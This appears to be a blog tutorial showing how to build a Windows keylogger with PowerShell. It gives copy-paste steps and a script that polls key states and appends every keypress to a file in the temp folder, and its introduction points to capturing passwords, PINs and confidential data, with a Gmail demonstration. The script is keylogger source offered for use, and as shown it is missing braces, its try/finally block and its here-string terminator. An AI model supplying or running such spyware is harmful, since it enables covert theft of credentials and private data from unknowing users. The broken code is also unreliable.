How to create a simple keylogger yourself in windows

How to create a simple keylogger yourself in windows: – Keylogging is the process of recording the key presses made on a keyboard on to a log. This is often done without the awareness of the user. Keylogging is widely used as a hacking trick as well. Using keylogging, all the keypresses made on a keyboard can be efficiently recorded. This can include passwords, usernames, secret pins, confidential data etc. Keylogging can be used to detect trespassing as well. In this article, a windows framework known as Powershell is used to create a simple keylogger. It consists of a command-line shell and associated scripting language. Powershell is built on the .NET framework and is used widely for various applications.

Also see:- How to stop windows 10 keylogger program


  • Spread out the Start menu. Type in Windows PowerShell in the search bar. From the search results, open the applications Windows PowerShell and Windows PowerShell ISE as shown in the screenshot.



  • Click on Windows PowerShell icon in the task bar. This will result in the popping up of Windows PowerShell command prompt.



  • Copy the code given below and paste it onto the Windows PowerShell command prompt. To copy or paste, you just need to select the code and right click, in the PowerShell command prompt.
    #requires -Version 2
    function Start-KeyLogger($Path="$env:temp\keylogger.txt") 
      # Signatures for API Calls
      $signatures = @'
    [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
    public static extern short GetAsyncKeyState(int virtualKeyCode); 
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int GetKeyboardState(byte[] keystate);
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int MapVirtualKey(uint uCode, int uMapType);
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
      # load signatures and make members available
      $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
      # create output file
      $null = New-Item -Path $Path -ItemType File -Force
        Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
        # create endless loop. When user presses CTRL+C, finally-block
        # executes and shows the collected key presses
        while ($true) {
          Start-Sleep -Milliseconds 40
          # scan all ASCII codes above 8
          for ($ascii = 9; $ascii -le 254; $ascii++) {
            # get current key state
            $state = $API::GetAsyncKeyState($ascii)
            # is key pressed?
            if ($state -eq -32767) {
              $null = [console]::CapsLock
              # translate scan code to real code
              $virtualKey = $API::MapVirtualKey($ascii, 3)
              # get keyboard state for virtual keys
              $kbstate = New-Object Byte[] 256
              $checkkbstate = $API::GetKeyboardState($kbstate)
              # prepare a StringBuilder to receive input key
              $mychar = New-Object -TypeName System.Text.StringBuilder
              # translate virtual key
              $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
              if ($success) 
                # add key to logger file
                [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
        # open logger file in Notepad
        notepad $Path
    # records all key presses until script is aborted by pressing CTRL+C
    # will then open the file with collected key codes


  • Now the Windows PowerShell will look like the following screenshot.



  • Now open some application and press some keys. I have opened G-Mail as an example.



  • Once you are done with pressing keys, look at the bottom of the code in the Windows PowerShell command prompt. There you will see an instruction Recording key presses. Press CTRL+C to see results. Press CTRL+C as per the instruction to see the logged keystrokes.


  • Pressing CTRL+C will result in the opening of a notepad file, which has the recorded keystrokes.



  • Alternatively, you can open the Windows PowerShell ISE as shown in the first step and copy the code. As next, click on the Play icon to run the script. This will also give the same result.


That’s it. Creating your own keylogger is not a walk through the ocean anymore. Hope the article was found useful.

Share on FacebookShare on Google+Tweet about this on TwitterShare on RedditShare on StumbleUponShare on LinkedIn

Leave a Reply

Your email address will not be published.